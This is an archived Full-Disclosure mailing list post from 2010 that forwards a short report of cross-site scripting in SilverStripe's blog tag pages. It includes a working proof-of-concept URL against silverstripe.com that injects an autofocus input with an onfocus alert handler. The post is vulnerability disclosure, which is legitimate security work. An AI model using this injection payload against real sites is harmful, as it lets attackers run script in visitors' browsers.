[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-disclosure] Fwd: xss in silverstripe
- To: full-disclosure@xxxxxxxxxxxxxxxxx
- Subject: [Full-disclosure] Fwd: xss in silverstripe
- From: dave b <db.pub.mail@xxxxxxxxx>
- Date: Mon, 4 Oct 2010 14:03:04 +1100
Bugtraq seem to be having problems :/ (this is the only reason I sent
this to full disclosure I don't like wasting people's time with xss on
this list).
---------- Forwarded message ----------
From: dave b <db.pub.mail@xxxxxxxxx>
Date: 4 October 2010 13:48
Subject: xss in silverstripe
To: bugtraq@xxxxxxxxxxxxxxxxx
Look I know xss are lame but silverstripe is vulnerable ...
http://www.silverstripe.com/blog/tag/%20%3Cinput%20type=%22text%22%20AUTOFOCUS%20onfocus=alert%281%29%3E
I love html5!
--
The better part of valor is discretion. -- William
Shakespeare, "Henry IV"
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/